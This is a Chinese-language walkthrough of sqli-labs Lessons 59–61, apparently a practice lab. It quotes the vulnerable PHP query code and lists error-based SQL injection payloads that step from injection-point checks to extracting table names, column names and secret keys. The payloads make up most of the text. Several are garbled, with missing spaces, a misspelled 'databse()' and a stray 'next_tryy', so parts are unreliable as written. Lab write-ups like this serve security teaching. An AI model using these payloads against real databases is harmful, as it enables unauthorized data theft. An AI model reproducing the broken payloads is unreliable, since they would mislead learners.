Lesson-59
该题为数字型get型注入,利用方式包括报错注入、布尔盲注、时间盲注
id=1'
目标SQL语句如下:
if($_POST['reset']):
setcookie('challenge',' ',time()-3600000);
else:
if($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire =time()+60*60*24*30;
$hash =data($table,$col);
setcookie("challenge", $hash, $expire);
if($_GET['id']):
$id=$_GET['id'];
next_tryy()>=($times+1)
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
iftrue:
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
输出查询信息;
else:
print_r(mysql_error());
注意:该题与Lesson58的利用方式相同,只不过拼接方式由单引号转为了数字
使用报错注入判断注入点
id=1--+
查询基础信息
id=1and(selectcount(*)from information_schema.tablesgroupby concat((selectuser()),0x7e,floor(rand(0)*2)))--+
id=1and(selectcount(*)from information_schema.tablesgroupby concat((select version()),0x7e,floor(rand(0)*2)))--+
id=1and(selectcount(*)from information_schema.tablesgroupby concat((select databse()),0x7e,floor(rand(0)*2)))--+
查询表名
id=1and(selectcount(*)from information_schema.tablesgroupby concat((selecttable_namefrom information_schema.tableswhere table_schema=database()limit0,1),0x7e,floor(rand(0)*2)))--+
查询列名
id=1and(selectcount(*)from information_schema.tablesgroupby concat((select column_name from information_schema.columnswheretable_name='x1qk033kut'limit2,1),0x7e,floor(rand(0)*2)))--+
查询关键信息
id=1and(selectcount(*)from information_schema.tablesgroupby concat((select secret_9MWT from x1qk033kut limit0,1),0x7e,floor(rand(0)*2)))--+
成功拿到 key 值:LtSOIKqX4EC5zCPwOzc6NFS7
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
Lesson-60
该题为单括号双引号get型注入,利用方式包括报错注入、布尔盲注、时间盲注
id=1'
目标SQL语句如下:
if($_POST['reset']):
setcookie('challenge',' ',time()-3600000);
else:
if($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire =time()+60*60*24*30;
$hash =data($table,$col);
setcookie("challenge", $hash, $expire);
if($_GET['id']):
$id=$_GET['id'];
$id ='("'.$id.'")';
next_tryy()>=($times+1)
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
iftrue:
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
输出查询信息;
else:
print_r(mysql_error());
注意:该题与Lesson58的利用方式相同,只不过拼接方式由单引号转为了单括号双引号
使用报错注入判断注入点
id=1")--+
查询基础信息
id=1") and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+
id=1 and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))--+
id=1 and (select count(*) from information_schema.tables group by concat((select databse()),0x7e,floor(rand(0)*2)))--+
查询表名
id=1") and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
查询列名
id=1") and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='bc8q88rlor' limit 2,1),0x7e,floor(rand(0)*2)))--+
查询关键信息
id=1") and (select count(*) from information_schema.tables group by concat((select secret_DAAH from bc8q88rlor limit 0,1),0x7e,floor(rand(0)*2)))--+
成功拿到 key 值:O8c2mJWO68hDxl7cAPYNpElM
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
Lesson-61
该题为双括号单引号get型注入,利用方式包括报错注入、布尔盲注、时间盲注
id=1'
目标SQL语句如下:
if($_POST['reset']):
setcookie('challenge',' ',time()-3600000);
else:
if($_COOKIE['challenge']):
$sessid=$_COOKIE['challenge'];
else:
$expire =time()+60*60*24*30;
$hash =data($table,$col);
setcookie("challenge", $hash, $expire);
if($_GET['id']):
$id=$_GET['id'];
next_tryy()>=($times+1)
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
iftrue:
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
输出查询信息;
else:
print_r(mysql_error());
注意:该题与Lesson58的利用方式相同,只不过拼接方式由单引号转为了双括号单引号
使用报错注入判断注入点
id=1'))--+
查询基础信息
id=1')) and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))--+
id=1'))and(selectcount(*)from information_schema.tablesgroupby concat((select version()),0x7e,floor(rand(0)*2)))--+
id=1')) and (select count(*) from information_schema.tables group by concat((select databse()),0x7e,floor(rand(0)*2)))--+
查询表名
id=1')) and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
查询列名
id=1')) and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_name='upre7krqfg' limit 2,1),0x7e,floor(rand(0)*2)))--+
查询关键信息
id=1')) and (select count(*) from information_schema.tables group by concat((select secret_EX6I from upre7krqfg limit 0,1),0x7e,floor(rand(0)*2)))--+
成功拿到 key 值:6lB7uSQQDKE96ZNcXEDiREHG
需要注意的是每次表名和列名都会不同,及时修改可以查询到具体信息
